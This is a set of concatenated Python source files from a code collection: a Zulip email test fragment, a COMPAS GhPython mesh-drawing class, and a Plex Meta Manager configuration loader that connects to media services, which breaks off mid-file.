tokenized_no_reply_email = parseaddr(from_email)[1]
self.assertTrue(re.search(self.TOKENIZED_NOREPLY_REGEX, tokenized_no_reply_email))
self.assertIn("reset your password", outbox[0].body)
class TestRealmReactivationEmail(ZulipTestCase):
COMMAND_NAME = "send_realm_reactivation_email"
def test_if_realm_not_deactivated(self) -> None:
realm = get_realm('zulip')
with self.assertRaisesRegex(CommandError, "The realm %s is already active." % (realm.name,)):
call_command(self.COMMAND_NAME, "--realm=zulip")
|
the-stack_106_12992
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import compas_ghpython
from compas_ghpython.artists.mixins import EdgeArtist
from compas_ghpython.artists.mixins import FaceArtist
from compas_ghpython.artists.mixins import VertexArtist
from compas.geometry import centroid_polygon
from compas.utilities import pairwise
__all__ = ['MeshArtist']
class MeshArtist(FaceArtist, EdgeArtist, VertexArtist):
"""A mesh artist defines functionality for visualising COMPAS meshes in GhPython.
Parameters
----------
mesh : compas.datastructures.Mesh
A COMPAS mesh.
Attributes
----------
defaults : dict
Default settings for color, scale, tolerance, ...
Examples
--------
.. code-block:: python
import compas
from compas.datastructures import Mesh
from compas_ghpython.artists import MeshArtist
mesh = Mesh.from_obj(compas.get('faces.obj'))
artist = MeshArtist(mesh)
artist.draw_faces(join_faces=True)
artist.draw_vertices(color={key: '#ff0000' for key in mesh.vertices_on_boundary()})
artist.draw_edges()
"""
def __init__(self, mesh):
self.mesh = mesh
self.defaults = {
'color.vertex': (255, 255, 255),
'color.edge': (0, 0, 0),
'color.face': (210, 210, 210),
}
@property
def mesh(self):
"""compas.datastructures.Mesh: The mesh that should be painted."""
return self.datastructure
@mesh.setter
def mesh(self, mesh):
self.datastructure = mesh
def draw(self, color=None):
"""Deprecated. Use ``draw_mesh()``"""
# NOTE: This warning should be triggered with warnings.warn(), not be a print statement, but GH completely ignores that
print('MeshArtist.draw() is deprecated: please use draw_mesh() instead')
return self.draw_mesh(color)
def draw_mesh(self, color=None):
key_index = self.mesh.key_index()
vertices = self.mesh.get_vertices_attributes('xyz')
faces = [[key_index[key] for key in self.mesh.face_vertices(fkey)] for fkey in self.mesh.faces()]
new_faces = []
for face in faces:
f = len(face)
if f == 3:
new_faces.append(face + [face[-1]])
elif f == 4:
new_faces.append(face)
elif f > 4:
centroid = len(vertices)
vertices.append(centroid_polygon(
[vertices[index] for index in face]))
for a, b in pairwise(face + face[0:1]):
new_faces.append([centroid, a, b, b])
else:
continue
return compas_ghpython.draw_mesh(vertices, new_faces, color)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
from compas.datastructures import Mesh
from compas.geometry import Polyhedron
poly = Polyhedron.generate(12)
mesh = Mesh.from_vertices_and_faces(poly.vertices, poly.faces)
artist = MeshArtist(mesh)
vertices = artist.draw_vertices()
faces = artist.draw_faces()
edges = artist.draw_edges()
|
the-stack_106_12995
|
import base64, logging, os, requests
from datetime import datetime
from lxml import html
from modules import util, radarr, sonarr
from modules.anidb import AniDB
from modules.anilist import AniList
from modules.cache import Cache
from modules.convert import Convert
from modules.icheckmovies import ICheckMovies
from modules.imdb import IMDb
from modules.letterboxd import Letterboxd
from modules.mal import MyAnimeList
from modules.notifiarr import Notifiarr
from modules.omdb import OMDb
from modules.plex import Plex
from modules.radarr import Radarr
from modules.sonarr import Sonarr
from modules.stevenlu import StevenLu
from modules.tautulli import Tautulli
from modules.tmdb import TMDb
from modules.trakt import Trakt
from modules.tvdb import TVDb
from modules.util import Failed
from modules.webhooks import Webhooks
from retrying import retry
from ruamel import yaml
logger = logging.getLogger("Plex Meta Manager")
sync_modes = {"append": "Only Add Items to the Collection", "sync": "Add & Remove Items from the Collection"}
mass_update_options = {"tmdb": "Use TMDb Metadata", "omdb": "Use IMDb Metadata through OMDb"}
class Config:
def __init__(self, default_dir, attrs):
logger.info("Locating config...")
config_file = attrs["config_file"]
if config_file and os.path.exists(config_file): self.config_path = os.path.abspath(config_file)
elif config_file and not os.path.exists(config_file): raise Failed(f"Config Error: config not found at {os.path.abspath(config_file)}")
elif os.path.exists(os.path.join(default_dir, "config.yml")): self.config_path = os.path.abspath(os.path.join(default_dir, "config.yml"))
else: raise Failed(f"Config Error: config not found at {os.path.abspath(default_dir)}")
logger.info(f"Using {self.config_path} as config")
self.default_dir = default_dir
self.test_mode = attrs["test"] if "test" in attrs else False
self.trace_mode = attrs["trace"] if "trace" in attrs else False
self.run_start_time = attrs["time"]
self.run_hour = datetime.strptime(attrs["time"], "%H:%M").hour
self.requested_collections = util.get_list(attrs["collections"]) if "collections" in attrs else None
self.requested_libraries = util.get_list(attrs["libraries"]) if "libraries" in attrs else None
self.resume_from = attrs["resume"] if "resume" in attrs else None
yaml.YAML().allow_duplicate_keys = True
try:
new_config, _, _ = yaml.util.load_yaml_guess_indent(open(self.config_path, encoding="utf-8"))
def replace_attr(all_data, attr, par):
if "settings" not in all_data:
all_data["settings"] = {}
if par in all_data and all_data[par] and attr in all_data[par] and attr not in all_data["settings"]:
all_data["settings"][attr] = all_data[par][attr]
del all_data[par][attr]
if "libraries" not in new_config:
new_config["libraries"] = {}
if "settings" not in new_config:
new_config["settings"] = {}
if "tmdb" not in new_config:
new_config["tmdb"] = {}
replace_attr(new_config, "cache", "cache")
replace_attr(new_config, "cache_expiration", "cache")
if "config" in new_config:
del new_config["cache"]
replace_attr(new_config, "asset_directory", "plex")
replace_attr(new_config, "sync_mode", "plex")
replace_attr(new_config, "show_unmanaged", "plex")
replace_attr(new_config, "show_filtered", "plex")
replace_attr(new_config, "show_missing", "plex")
replace_attr(new_config, "save_missing", "plex")
if new_config["libraries"]:
for library in new_config["libraries"]:
if new_config["libraries"][library] and "plex" in new_config["libraries"][library]:
replace_attr(new_config["libraries"][library], "asset_directory", "plex")
replace_attr(new_config["libraries"][library], "sync_mode", "plex")
replace_attr(new_config["libraries"][library], "show_unmanaged", "plex")
replace_attr(new_config["libraries"][library], "show_filtered", "plex")
replace_attr(new_config["libraries"][library], "show_missing", "plex")
replace_attr(new_config["libraries"][library], "save_missing", "plex")
if "libraries" in new_config: new_config["libraries"] = new_config.pop("libraries")
if "settings" in new_config: new_config["settings"] = new_config.pop("settings")
if "webhooks" in new_config: new_config["webhooks"] = new_config.pop("webhooks")
if "plex" in new_config: new_config["plex"] = new_config.pop("plex")
if "tmdb" in new_config: new_config["tmdb"] = new_config.pop("tmdb")
if "tautulli" in new_config: new_config["tautulli"] = new_config.pop("tautulli")
if "omdb" in new_config: new_config["omdb"] = new_config.pop("omdb")
if "notifiarr" in new_config: new_config["notifiarr"] = new_config.pop("notifiarr")
if "anidb" in new_config: new_config["anidb"] = new_config.pop("anidb")
if "radarr" in new_config: new_config["radarr"] = new_config.pop("radarr")
if "sonarr" in new_config: new_config["sonarr"] = new_config.pop("sonarr")
if "trakt" in new_config: new_config["trakt"] = new_config.pop("trakt")
if "mal" in new_config: new_config["mal"] = new_config.pop("mal")
yaml.round_trip_dump(new_config, open(self.config_path, "w", encoding="utf-8"), indent=None, block_seq_indent=2)
self.data = new_config
except yaml.scanner.ScannerError as e:
raise Failed(f"YAML Error: {util.tab_new_lines(e)}")
except Exception as e:
util.print_stacktrace()
raise Failed(f"YAML Error: {e}")
def check_for_attribute(data, attribute, parent=None, test_list=None, default=None, do_print=True, default_is_none=False, req_default=False, var_type="str", throw=False, save=True):
endline = ""
if parent is not None:
if data and parent in data:
data = data[parent]
else:
data = None
do_print = False
save = False
text = f"{attribute} attribute" if parent is None else f"{parent} sub-attribute {attribute}"
if data is None or attribute not in data:
message = f"{text} not found"
if parent and save is True:
loaded_config, _, _ = yaml.util.load_yaml_guess_indent(open(self.config_path))
endline = f"\n{parent} sub-attribute {attribute} added to config"
if parent not in loaded_config or not loaded_config[parent]: loaded_config[parent] = {attribute: default}
elif attribute not in loaded_config[parent]: loaded_config[parent][attribute] = default
else: endline = ""
yaml.round_trip_dump(loaded_config, open(self.config_path, "w"), indent=None, block_seq_indent=2)
elif data[attribute] is None:
if default_is_none is True: return None
else: message = f"{text} is blank"
elif var_type == "url":
if data[attribute].endswith(("\\", "/")): return data[attribute][:-1]
else: return data[attribute]
elif var_type == "bool":
if isinstance(data[attribute], bool): return data[attribute]
else: message = f"{text} must be either true or false"
elif var_type == "int":
if isinstance(data[attribute], int) and data[attribute] >= 0: return data[attribute]
else: message = f"{text} must an integer >= 0"
elif var_type == "path":
if os.path.exists(os.path.abspath(data[attribute])): return data[attribute]
else: message = f"Path {os.path.abspath(data[attribute])} does not exist"
elif var_type == "list": return util.get_list(data[attribute], split=False)
elif var_type == "list_path":
temp_list = [p for p in util.get_list(data[attribute], split=False) if os.path.exists(os.path.abspath(p))]
if len(temp_list) > 0: return temp_list
else: message = "No Paths exist"
elif var_type == "lower_list": return util.get_list(data[attribute], lower=True)
elif test_list is None or data[attribute] in test_list: return data[attribute]
else: message = f"{text}: {data[attribute]} is an invalid input"
if var_type == "path" and default and os.path.exists(os.path.abspath(default)):
return default
elif var_type == "path" and default:
if data and attribute in data and data[attribute]:
message = f"neither {data[attribute]} or the default path {default} could be found"
else:
message = f"no {text} found and the default path {default} could not be found"
default = None
if default is not None or default_is_none:
message = message + f" using {default} as default"
message = message + endline
if req_default and default is None:
raise Failed(f"Config Error: {attribute} attribute must be set under {parent} globally or under this specific Library")
options = ""
if test_list:
for option, description in test_list.items():
if len(options) > 0:
options = f"{options}\n"
options = f"{options} {option} ({description})"
if (default is None and not default_is_none) or throw:
if len(options) > 0:
message = message + "\n" + options
raise Failed(f"Config Error: {message}")
if do_print:
util.print_multiline(f"Config Warning: {message}")
if data and attribute in data and data[attribute] and test_list is not None and data[attribute] not in test_list:
util.print_multiline(options)
return default
self.session = requests.Session()
self.general = {
"cache": check_for_attribute(self.data, "cache", parent="settings", var_type="bool", default=True),
"cache_expiration": check_for_attribute(self.data, "cache_expiration", parent="settings", var_type="int", default=60),
"asset_directory": check_for_attribute(self.data, "asset_directory", parent="settings", var_type="list_path", default=[os.path.join(default_dir, "assets")]),
"asset_folders": check_for_attribute(self.data, "asset_folders", parent="settings", var_type="bool", default=True),
"assets_for_all": check_for_attribute(self.data, "assets_for_all", parent="settings", var_type="bool", default=False, save=False, do_print=False),
"sync_mode": check_for_attribute(self.data, "sync_mode", parent="settings", default="append", test_list=sync_modes),
"run_again_delay": check_for_attribute(self.data, "run_again_delay", parent="settings", var_type="int", default=0),
"show_unmanaged": check_for_attribute(self.data, "show_unmanaged", parent="settings", var_type="bool", default=True),
"show_filtered": check_for_attribute(self.data, "show_filtered", parent="settings", var_type="bool", default=False),
"show_missing": check_for_attribute(self.data, "show_missing", parent="settings", var_type="bool", default=True),
"show_missing_assets": check_for_attribute(self.data, "show_missing_assets", parent="settings", var_type="bool", default=True),
"save_missing": check_for_attribute(self.data, "save_missing", parent="settings", var_type="bool", default=True),
"missing_only_released": check_for_attribute(self.data, "missing_only_released", parent="settings", var_type="bool", default=False),
"create_asset_folders": check_for_attribute(self.data, "create_asset_folders", parent="settings", var_type="bool", default=False),
"collection_minimum": check_for_attribute(self.data, "collection_minimum", parent="settings", var_type="int", default=1),
"delete_below_minimum": check_for_attribute(self.data, "delete_below_minimum", parent="settings", var_type="bool", default=False),
"tvdb_language": check_for_attribute(self.data, "tvdb_language", parent="settings", default="default")
}
self.webhooks = {
"error": check_for_attribute(self.data, "error", parent="webhooks", var_type="list", default_is_none=True),
"run_start": check_for_attribute(self.data, "run_start", parent="webhooks", var_type="list", default_is_none=True),
"run_end": check_for_attribute(self.data, "run_end", parent="webhooks", var_type="list", default_is_none=True),
"collection_creation": check_for_attribute(self.data, "collection_creation", parent="webhooks", var_type="list", default_is_none=True),
"collection_addition": check_for_attribute(self.data, "collection_addition", parent="webhooks", var_type="list", default_is_none=True),
"collection_removal": check_for_attribute(self.data, "collection_removal", parent="webhooks", var_type="list", default_is_none=True),
}
if self.general["cache"]:
util.separator()
self.Cache = Cache(self.config_path, self.general["cache_expiration"])
else:
self.Cache = None
util.separator()
self.NotifiarrFactory = None
if "notifiarr" in self.data:
logger.info("Connecting to Notifiarr...")
try:
self.NotifiarrFactory = Notifiarr(self, {
"apikey": check_for_attribute(self.data, "apikey", parent="notifiarr", throw=True),
"develop": check_for_attribute(self.data, "develop", parent="notifiarr", var_type="bool", default=False, do_print=False, save=False),
"test": check_for_attribute(self.data, "test", parent="notifiarr", var_type="bool", default=False, do_print=False, save=False)
})
except Failed as e:
logger.error(e)
logger.info(f"Notifiarr Connection {'Failed' if self.NotifiarrFactory is None else 'Successful'}")
else:
logger.warning("notifiarr attribute not found")
self.Webhooks = Webhooks(self, self.webhooks, notifiarr=self.NotifiarrFactory)
self.Webhooks.start_time_hooks(self.run_start_time)
self.errors = []
util.separator()
try:
self.TMDb = None
if "tmdb" in self.data:
logger.info("Connecting to TMDb...")
self.TMDb = TMDb(self, {
"apikey": check_for_attribute(self.data, "apikey", parent="tmdb", throw=True),
"language": check_for_attribute(self.data, "language", parent="tmdb", default="en")
})
logger.info(f"TMDb Connection {'Failed' if self.TMDb is None else 'Successful'}")
else:
raise Failed("Config Error: tmdb attribute not found")
util.separator()
self.OMDb = None
if "omdb" in self.data:
logger.info("Connecting to OMDb...")
try:
self.OMDb = OMDb(self, {"apikey": check_for_attribute(self.data, "apikey", parent="omdb", throw=True)})
except Failed as e:
self.errors.append(e)
logger.error(e)
logger.info(f"OMDb Connection {'Failed' if self.OMDb is None else 'Successful'}")
else:
logger.warning("omdb attribute not found")
util.separator()
self.Trakt = None
if "trakt" in self.data:
logger.info("Connecting to Trakt...")
try:
self.Trakt = Trakt(self, {
"client_id": check_for_attribute(self.data, "client_id", parent="trakt", throw=True),
"client_secret": check_for_attribute(self.data, "client_secret", parent="trakt", throw=True),
"config_path": self.config_path,
"authorization": self.data["trakt"]["authorization"] if "authorization" in self.data["trakt"] else None
})
except Failed as e:
self.errors.append(e)
logger.error(e)
logger.info(f"Trakt Connection {'Failed' if self.Trakt is None else 'Successful'}")
else:
logger.warning("trakt attribute not found")
util.separator()
self.MyAnimeList = None
if "mal" in self.data:
logger.info("Connecting to My Anime List...")
try:
self.MyAnimeList = MyAnimeList(self, {
"client_id": check_for_attribute(self.data, "client_id", parent="mal", throw=True),
"client_secret": check_for_attribute(self.data, "client_secret", parent="mal", throw=True),
"config_path": self.config_path,
"authorization": self.data["mal"]["authorization"] if "authorization" in self.data["mal"] else None
})
except Failed as e:
self.errors.append(e)
logger.error(e)
logger.info(f"My Anime List Connection {'Failed' if self.MyAnimeList is None else 'Successful'}")
else:
logger.warning("mal attribute not found")
util.separator()
self.AniDB = None
if "anidb" in self.data:
util.separator()
logger.info("Connecting to AniDB...")
try:
self.AniDB = AniDB(self, {
"username": check_for_attribute(self.data, "username", parent="anidb", throw=True),
"password": check_for_attribute(self.data, "password", parent="anidb", throw=True)
})
except Failed as e:
self.errors.append(e)
logger.error(e)
logger.info(f"My Anime List Connection {'Failed Continuing as Guest ' if self.MyAnimeList is None else 'Successful'}")
if self.AniDB is None:
self.AniDB = AniDB(self, None)
self.TVDb = TVDb(self, self.general["tvdb_language"])
self.IMDb = IMDb(self)
self.Convert = Convert(self)
self.AniList = AniList(self)
self.Letterboxd = Letterboxd(self)
self.ICheckMovies = ICheckMovies(self)
self.StevenLu = StevenLu(self)
util.separator()
logger.info("Connecting to Plex Libraries...")
self.general["plex"] = {
"url": check_for_attribute(self.data, "url", parent="plex", var_type="url", default_is_none=True),
"token": check_for_attribute(self.data, "token", parent="plex", default_is_none=True),
"timeout": check_for_attribute(self.data, "timeout", parent="plex", var_type="int", default=60),
"clean_bundles": check_for_attribute(self.data, "clean_bundles", parent="plex", var_type="bool", default=False),
"empty_trash": check_for_attribute(self.data, "empty_trash", parent="plex", var_type="bool", default=False),
"optimize": check_for_attribute(self.data, "optimize", parent="plex", var_type="bool", default=False)
}
self.general["radarr"] = {
"url": check_for_attribute(self.data, "url", parent="radarr", var_type="url", default_is_none=True),
"token": check_for_attribute(self.data, "token", parent="radarr", default_is_none=True),
"add": check_for_attribute(self.data, "add", parent="radarr", var_type="bool", default=False),
"add_existing": check_for_attribute(self.data, "add_existing", parent="radarr", var_type="bool", default=False),
"root_folder_path": check_for_attribute(self.data, "root_folder_path", parent="radarr", default_is_none=True),
"monitor": check_for_attribute(self.data, "monitor", parent="radarr", var_type="bool", default=True),
"availability": check_for_attribute(self.data, "availability", parent="radarr", test_list=radarr.availability_descriptions, default="announced"),
"quality_profile": check_for_attribute(self.data, "quality_profile", parent="radarr", default_is_none=True),
"tag": check_for_attribute(self.data, "tag", parent="radarr", var_type="lower_list", default_is_none=True),
"search": check_for_attribute(self.data, "search", parent="radarr", var_type="bool", default=False)
}
self.general["sonarr"] = {
"url": check_for_attribute(self.data, "url", parent="sonarr", var_type="url", default_is_none=True),
"token": check_for_attribute(self.data, "token", parent="sonarr", default_is_none=True),
"add": check_for_attribute(self.data, "add", parent="sonarr", var_type="bool", default=False),
"add_existing": check_for_attribute(self.data, "add_existing", parent="sonarr", var_type="bool", default=False),
"root_folder_path": check_for_attribute(self.data, "root_folder_path", parent="sonarr", default_is_none=True),
"monitor": check_for_attribute(self.data, "monitor", parent="sonarr", test_list=sonarr.monitor_descriptions, default="all"),
"quality_profile": check_for_attribute(self.data, "quality_profile", parent="sonarr", default_is_none=True),
"language_profile": check_for_attribute(self.data, "language_profile", parent="sonarr", default_is_none=True),
"series_type": check_for_attribute(self.data, "series_type", parent="sonarr", test_list=sonarr.series_type_descriptions, default="standard"),
"season_folder": check_for_attribute(self.data, "season_folder", parent="sonarr", var_type="bool", default=True),
"tag": check_for_attribute(self.data, "tag", parent="sonarr", var_type="lower_list", default_is_none=True),
"search": check_for_attribute(self.data, "search", parent="sonarr", var_type="bool", default=False),
"cutoff_search": check_for_attribute(self.data, "cutoff_search", parent="sonarr", var_type="bool", default=False)
}
self.general["tautulli"] = {
"url": check_for_attribute(self.data, "url", parent="tautulli", var_type="url", default_is_none=True),
"apikey": check_for_attribute(self.data, "apikey", parent="tautulli", default_is_none=True)
}
self.libraries = []
libs = check_for_attribute(self.data, "libraries", throw=True)
for library_name, lib in libs.items():
if self.requested_libraries and library_name not in self.requested_libraries:
continue
util.separator()
params = {
"mapping_name": str(library_name),
"name": str(lib["library_name"]) if lib and "library_name" in lib and lib["library_name"] else str(library_name)
}
display_name = f"{params['name']} ({params['mapping_name']})" if lib and "library_name" in lib and lib["library_name"] else params["mapping_name"]
util.separator(f"{display_name} Configuration")
logger.info("")
logger.info(f"Connecting to {display_name} Library...")
params["asset_directory"] = check_for_attribute(lib, "asset_directory", parent="settings", var_type="list_path", default=self.general["asset_directory"], default_is_none=True, save=False)
if params["asset_directory"] is None:
logger.warning("Config Warning: Assets will not be used asset_directory attribute must be set under config or under this specific Library")
params["asset_folders"] = check_for_attribute(lib, "asset_folders", parent="settings", var_type="bool", default=self.general["asset_folders"], do_print=False, save=False)
params["sync_mode"] = check_for_attribute(lib, "sync_mode", parent="settings", test_list=sync_modes, default=self.general["sync_mode"], do_print=False, save=False)
params["show_unmanaged"] = check_for_attribute(lib, "show_unmanaged", parent="settings", var_type="bool", default=self.general["show_unmanaged"], do_print=False, save=False)
params["show_filtered"] = check_for_attribute(lib, "show_filtered", parent="settings", var_type="bool", default=self.general["show_filtered"], do_print=False, save=False)
params["show_missing"] = check_for_attribute(lib, "show_missing", parent="settings", var_type="bool", default=self.general["show_missing"], do_print=False, save=False)
params["show_missing_assets"] = check_for_attribute(lib, "show_missing_assets", parent="settings", var_type="bool", default=self.general["show_missing_assets"], do_print=False, save=False)
params["save_missing"] = check_for_attribute(lib, "save_missing", parent="settings", var_type="bool", default=self.general["save_missing"], do_print=False, save=False)
params["missing_only_released"] = check_for_attribute(lib, "missing_only_released", parent="settings", var_type="bool", default=self.general["missing_only_released"], do_print=False, save=False)
params["create_asset_folders"] = check_for_attribute(lib, "create_asset_folders", parent="settings", var_type="bool", default=self.general["create_asset_folders"], do_print=False, save=False)
params["collection_minimum"] = check_for_attribute(lib, "collection_minimum", parent="settings", var_type="int", default=self.general["collection_minimum"], do_print=False, save=False)
params["delete_below_minimum"] = check_for_attribute(lib, "delete_below_minimum", parent="settings", var_type="bool", default=self.general["delete_below_minimum"], do_print=False, save=False)
params["delete_unmanaged_collections"] = check_for_attribute(lib, "delete_unmanaged_collections", parent="settings", var_type="bool", default=False, do_print=False, save=False)
params["delete_collections_with_less"] = check_for_attribute(lib, "delete_collections_with_less", parent="settings", var_type="int", default_is_none=True, do_print=False, save=False)
params["error_webhooks"] = check_for_attribute(lib, "error", parent="webhooks", var_type="list", default=self.webhooks["error"], do_print=False, save=False, default_is_none=True)
params["collection_creation_webhooks"] = check_for_attribute(lib, "collection_creation", parent="webhooks", var_type="list", default=self.webhooks["collection_creation"], do_print=False, save=False, default_is_none=True)
params["collection_addition_webhooks"] = check_for_attribute(lib, "collection_addition", parent="webhooks", var_type="list", default=self.webhooks["collection_addition"], do_print=False, save=False, default_is_none=True)
params["collection_removal_webhooks"] = check_for_attribute(lib, "collection_removal", parent="webhooks", var_type="list", default=self.webhooks["collection_removal"], do_print=False, save=False, default_is_none=True)
params["assets_for_all"] = check_for_attribute(lib, "assets_for_all", parent="settings", var_type="bool", default=self.general["assets_for_all"], do_print=False, save=False)
params["mass_genre_update"] = check_for_attribute(lib, "mass_genre_update", test_list=mass_update_options, default_is_none=True, save=False, do_print=False)
params["mass_audience_rating_update"] = check_for_attribute(lib, "mass_audience_rating_update", test_list=mass_update_options, default_is_none=True, save=False, do_print=False)
params["mass_critic_rating_update"] = check_for_attribute(lib, "mass_critic_rating_update", test_list=mass_update_options, default_is_none=True, save=False, do_print=False)
params["mass_trakt_rating_update"] = check_for_attribute(lib, "mass_trakt_rating_update", var_type="bool", default=False, save=False, do_print=False)
params["split_duplicates"] = check_for_attribute(lib, "split_duplicates", var_type="bool", default=False, save=False, do_print=False)
params["radarr_add_all"] = check_for_attribute(lib, "radarr_add_all", var_type="bool", default=False, save=False, do_print=False)
params["sonarr_add_all"] = check_for_attribute(lib, "sonarr_add_all", var_type="bool", default=False, save=False, do_print=False)
if lib and "operations" in lib and lib["operations"]:
if isinstance(lib["operations"], dict):
if "assets_for_all" in lib["operations"]:
params["assets_for_all"] = check_for_attribute(lib["operations"], "assets_for_all", var_type="bool", default=False, save=False)
if "delete_unmanaged_collections" in lib["operations"]:
params["delete_unmanaged_collections"] = check_for_attribute(lib["operations"], "delete_unmanaged_collections", var_type="bool", default=False, save=False)
if "delete_collections_with_less" in lib["operations"]:
params["delete_collections_with_less"] = check_for_attribute(lib["operations"], "delete_collections_with_less", var_type="int", default_is_none=True, save=False)
if "mass_genre_update" in lib["operations"]:
params["mass_genre_update"] = check_for_attribute(lib["operations"], "mass_genre_update", test_list=mass_update_options, default_is_none=True, save=False)
if "mass_audience_rating_update" in lib["operations"]:
params["mass_audience_rating_update"] = check_for_attribute(lib["operations"], "mass_audience_rating_update", test_list=mass_update_options, default_is_none=True, save=False)
if "mass_critic_rating_update" in lib["operations"]:
params["mass_critic_rating_update"] = check_for_attribute(lib["operations"], "mass_critic_rating_update", test_list=mass_update_options, default_is_none=True, save=False)
if "mass_trakt_rating_update" in lib["operations"]:
params["mass_trakt_rating_update"] = check_for_attribute(lib["operations"], "mass_trakt_rating_update", var_type="bool", default=False, save=False)
if "split_duplicates" in lib["operations"]:
params["split_duplicates"] = check_for_attribute(lib["operations"], "split_duplicates", var_type="bool", default=False, save=False)
if "radarr_add_all" in lib["operations"]:
params["radarr_add_all"] = check_for_attribute(lib["operations"], "radarr_add_all", var_type="bool", default=False, save=False)
if "sonarr_add_all" in lib["operations"]:
params["sonarr_add_all"] = check_for_attribute(lib["operations"], "sonarr_add_all", var_type="bool", default=False, save=False)
else:
logger.error("Config Error: operations must be a dictionary")
def error_check(attr, service):
params[attr] = None
err = f"Config Error: {attr} cannot be omdb without a successful {service} Connection"
self.errors.append(err)
logger.error(err)
if self.OMDb is None and params["mass_genre_update"] == "omdb":
error_check("mass_genre_update", "OMDb")
if self.OMDb is None and params["mass_audience_rating_update"] == "omdb":
error_check("mass_audience_rating_update", "OMDb")
if self.OMDb is None and params["mass_critic_rating_update"] == "omdb":
error_check("mass_critic_rating_update", "OMDb")
if self.Trakt is None and params["mass_trakt_rating_update"]:
error_check("mass_trakt_rating_update", "Trakt")
try:
if lib and "metadata_path" in lib:
params["metadata_path"] = []
if lib["metadata_path"] is None:
raise Failed("Config Error: metadata_path attribute is blank")
paths_to_check = lib["metadata_path"] if isinstance(lib["metadata_path"], list) else [lib["metadata_path"]]
for path in paths_to_check:
if isinstance(path, dict):
def check_dict(attr, name):
if attr in path:
if path[attr] is None:
err = f"Config Error: metadata_path {attr} is blank"
self.errors.append(err)
logger.error(err)
else:
params["metadata_path"].append((name, path[attr]))
check_dict("url", "URL")
check_dict("git", "Git")
check_dict("file", "File")
check_dict("folder", "Folder")
else:
params["metadata_path"].append(("File", path))
else:
params["metadata_path"] = [("File", os.path.join(default_dir, f"{library_name}.yml"))]
params["default_dir"] = default_dir
params["plex"] = {
"url": check_for_attribute(lib, "url", parent="plex", var_type="url", default=self.general["plex"]["url"], req_default=True, save=False),
"token": check_for_attribute(lib, "token", parent="plex", default=self.general["plex"]["token"], req_default=True, save=False),
"timeout": check_for_attribute(lib, "timeout", parent="plex", var_type="int", default=self.general["plex"]["timeout"], save=False),
"clean_bundles": check_for_attribute(lib, "clean_bundles", parent="plex", var_type="bool", default=self.general["plex"]["clean_bundles"], save=False),
"empty_trash": check_for_attribute(lib, "empty_trash", parent="plex", var_type="bool", default=self.general["plex"]["empty_trash"], save=False),
"optimize": check_for_attribute(lib, "optimize", parent="plex", var_type="bool", default=self.general["plex"]["optimize"], save=False)
}
library = Plex(self, params)
logger.info("")
logger.info(f"{display_name} Library Connection Successful")
except Failed as e:
self.errors.append(e)
util.print_stacktrace()
util.print_multiline(e, error=True)
logger.info(f"{display_name} Library Connection Failed")
continue
if self.general["radarr"]["url"] or (lib and "radarr" in lib):
logger.info("")
util.separator("Radarr Configuration", space=False, border=False)
logger.info("")
logger.info(f"Connecting to {display_name} library's Radarr...")
logger.info("")
try:
library.Radarr = Radarr(self, {
"url": check_for_attribute(lib, "url", parent="radarr", var_type="url", default=self.general["radarr"]["url"], req_default=True, save=False),
"token": check_for_attribute(lib, "token", parent="radarr", default=self.general["radarr"]["token"], req_default=True, save=False),
"add": check_for_attribute(lib, "add", parent="radarr", var_type="bool", default=self.general["radarr"]["add"], save=False),
"add_existing": check_for_attribute(lib, "add_existing", parent="radarr", var_type="bool", default=self.general["radarr"]["add_existing"], save=False),
"root_folder_path": check_for_attribute(lib, "root_folder_path", parent="radarr", default=self.general["radarr"]["root_folder_path"], req_default=True, save=False),
"monitor": check_for_attribute(lib, "monitor", parent="radarr", var_type="bool", default=self.general["radarr"]["monitor"], save=False),
"availability": check_for_attribute(lib, "availability", parent="radarr", test_list=radarr.availability_descriptions, default=self.general["radarr"]["availability"], save=False),
"quality_profile": check_for_attribute(lib, "quality_profile", parent="radarr",default=self.general["radarr"]["quality_profile"], req_default=True, save=False),
"tag": check_for_attribute(lib, "tag", parent="radarr", var_type="lower_list", default=self.general["radarr"]["tag"], default_is_none=True, save=False),
"search": check_for_attribute(lib, "search", parent="radarr", var_type="bool", default=self.general["radarr"]["search"], save=False)
})
except Failed as e:
self.errors.append(e)
util.print_stacktrace()
util.print_multiline(e, error=True)
logger.info("")
logger.info(f"{display_name} library's Radarr Connection {'Failed' if library.Radarr is None else 'Successful'}")
if self.general["sonarr"]["url"] or (lib and "sonarr" in lib):
logger.info("")
util.separator("Sonarr Configuration", space=False, border=False)
logger.info("")
logger.info(f"Connecting to {display_name} library's Sonarr...")
logger.info("")
try:
library.Sonarr = Sonarr(self, {
"url": check_for_attribute(lib, "url", parent="sonarr", var_type="url", default=self.general["sonarr"]["url"], req_default=True, save=False),
"token": check_for_attribute(lib, "token", parent="sonarr", default=self.general["sonarr"]["token"], req_default=True, save=False),
"add": check_for_attribute(lib, "add", parent="sonarr", var_type="bool", default=self.general["sonarr"]["add"], save=False),
"add_existing": check_for_attribute(lib, "add_existing", parent="sonarr", var_type="bool", default=self.general["sonarr"]["add_existing"], save=False),
"root_folder_path": check_for_attribute(lib, "root_folder_path", parent="sonarr", default=self.general["sonarr"]["root_folder_path"], req_default=True, save=False),
"monitor": check_for_attribute(lib, "monitor", parent="sonarr", test_list=sonarr.monitor_descriptions, default=self.general["sonarr"]["monitor"], save=False),
"quality_profile": check_for_attribute(lib, "quality_profile", parent="sonarr", default=self.general["sonarr"]["quality_profile"], req_default=True, save=False),
"language_profile": check_for_attribute(lib, "language_profile", parent="sonarr", default=self.general["sonarr"]["language_profile"], save=False) if self.general["sonarr"]["language_profile"] else check_for_attribute(lib, "language_profile", parent="sonarr", default_is_none=True, save=False),
"series_type": check_for_attribute(lib, "series_type", parent="sonarr", test_list=sonarr.series_type_descriptions, default=self.general["sonarr"]["series_type"], save=False),
"season_folder": check_for_attribute(lib, "season_folder", parent="sonarr", var_type="bool", default=self.general["sonarr"]["season_folder"], save=False),
"tag": check_for_attribute(lib, "tag", parent="sonarr", var_type="lower_list", default=self.general["sonarr"]["tag"], default_is_none=True, save=False),
"search": check_for_attribute(lib, "search", parent="sonarr", var_type="bool", default=self.general["sonarr"]["search"], save=False),
"cutoff_search": check_for_attribute(lib, "cutoff_search", parent="sonarr", var_type="bool", default=self.general["sonarr"]["cutoff_search"], save=False)
})
except Failed as e:
self.errors.append(e)
util.print_stacktrace()
util.print_multiline(e, error=True)
logger.info("")
logger.info(f"{display_name} library's Sonarr Connection {'Failed' if library.Sonarr is None else 'Successful'}")
if self.general["tautulli"]["url"] or (lib and "tautulli" in lib):
